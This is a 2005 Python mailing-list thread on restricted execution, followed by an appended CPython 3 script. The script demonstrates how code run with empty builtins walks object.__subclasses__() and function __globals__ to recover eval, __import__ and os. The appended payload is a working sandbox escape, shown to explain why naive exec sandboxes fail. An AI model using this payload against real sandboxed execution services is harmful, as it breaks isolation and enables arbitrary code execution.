Jack Diederich wrote:
On Wed, Jan 26, 2005 at 10:23:03AM -0700, Steven Bethard wrote:

Jack Diederich wrote:

Yes, this comes up every couple months and there is only one answer:
This is the job of the OS.
Java largely succeeds at doing sandboxy things because it was written that way from the ground up (to behave both like a program interpreter and an OS).
Python the language was not, and the CPython interpreter definitely was not.


Search groups.google.com for previous discussions of this on c.l.py

Could you give some useful queries? Every time I do this search, I get a few results, but never anything that really goes into the security holes in any depth. (They're usually something like -- "look, given object, I can get int" not "look, given object, I can get eval, __import__, etc.")


A search on "rexec bastion" will give you most of the threads, search on "rexec bastion diederich" to see the other times I tried to
stop the threads by recommending reading the older ones *wink*.


Thread subjects:
Replacement for rexec/Bastion?
Creating a capabilities-based restricted execution system
Embedding Python in Python
killing thread ?

Thanks for the keywords -- I hadn't tried anything like any of these. Unfortunately, they leave me with the same feeling as before... The closest example that I saw that actually showed a security hole made use of __builtins__. As you'll note from the beginning of this thread, I was considering the case where no builtins are provided and imports are disabled.


I also read a number of messages that had the same problems I do -- too many threads just say "look at google groups", without saying what to search for. They also often spend most of their time talking about abstract problems, without showing code that illustrates how to break the "security". For example, I never found anything close to describing how to retrieve, say, 'eval' or '__import__' given only 'object'.

What would be really nice is a wiki that had examples of how to derive "unsafe" functions from 'object'. I'd be glad to put one together, but so far, I can't find many examples... If you want to consider reading and writing of files as "unsafe", then I guess this might be one:
file = object.__subclasses__()[16]
If I could see how to go from 'object' (or 'int', 'str', 'file', etc.) to 'eval' or '__import__', that would help out a lot...


Steve
--
http://mail.python.org/mailman/listinfo/python-list
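The walk from `object` to `eval` and `__import__` that Steve asks for above, as an added example that is not part of the thread. It targets the exact setup he describes (code executed with no builtins and no way to import) on a current CPython 3 interpreter, so the 2005-era `file` class is gone, but the idea behind his `object.__subclasses__()[16]` line carries over: every pure-Python method carries `__globals__`, the globals of any imported module contain `__builtins__`, and `object.__subclasses__()` reaches every loaded class. The payload searches the class tree by that shape instead of by a fixed index, which is why it does not depend on which subclass happens to sit at position 16. The names `run_untrusted`, `PAYLOAD`, `naive_check` and `escape_demo` are mine; the sandbox is the naive `exec(code, {"__builtins__": {}})` that threads like this one keep proposing.

```python
import builtins

# Untrusted code, run with __builtins__ = {}: no eval, no __import__, no
# getattr/type/isinstance. Only literals, attribute access and the data
# model are available, which turns out to be enough.
PAYLOAD = r'''
obj = ().__class__.__mro__[-1]        # the `object` type, reached from a literal
func_type = (lambda: 0).__class__     # types.FunctionType, without importing types
dict_type = {}.__class__

def builtins_via(cls):
    # A pure-Python method carries its defining module's globals, and the
    # globals of any imported module hold __builtins__ (a dict, or the
    # builtins module itself in __main__). Frozen bootstrap modules may
    # lack the key, so they are skipped rather than assumed.
    for value in cls.__dict__.values():
        if value.__class__ is func_type and '__builtins__' in value.__globals__:
            b = value.__globals__['__builtins__']
            return b if b.__class__ is dict_type else b.__dict__
    return None

def find_builtins(root):
    # Depth-first walk of the class tree below `root`, searching by shape
    # rather than by a brittle fixed index such as object.__subclasses__()[16].
    seen = {}
    todo = [root]
    while todo:
        cls = todo.pop()
        if cls in seen:
            continue
        seen[cls] = 1
        b = builtins_via(cls)
        if b is not None:
            return b
        try:
            todo.extend(cls.__subclasses__())
        except:        # bare except: the name TypeError is not available here;
            pass       # type.__subclasses__() needs an argument, so skip it
    return None

b = find_builtins(obj)
__import__ = b['__import__']      # the two names the thread asks about
eval = b['eval']
os = __import__('os')
proof = eval('os.sep', {'os': os})
'''


def run_untrusted(source):
    """The naive restricted executor under discussion: run `source` with an
    empty builtins namespace and no import machinery exposed to it."""
    ns = {"__builtins__": {}}
    exec(source, ns)
    return ns


def naive_check():
    """Why such sandboxes look safe: a direct use of eval raises NameError."""
    try:
        run_untrusted("eval('1 + 1')")
    except NameError:
        return True
    return False


def escape_demo():
    """Run PAYLOAD under run_untrusted and report what it recovered:
    the value it computed with the recovered eval/os, and whether the
    dict it found is the interpreter's real builtins namespace."""
    ns = run_untrusted(PAYLOAD)
    return ns["proof"], ns["b"] is vars(builtins)


if __name__ == "__main__":
    print("direct eval blocked:", naive_check())
    print("(os.sep via recovered eval, real builtins?):", escape_demo())
```

`naive_check()` is the test that makes people trust the empty-builtins approach; `escape_demo()` is the same executor with the payload above, and it hands back the real `builtins` dict, a working `__import__`, and whatever `os` can do. Removing `__subclasses__` or `__globals__` from the sandboxed objects is the usual next proposal, and the older threads Jack points to cover why that chase does not end either.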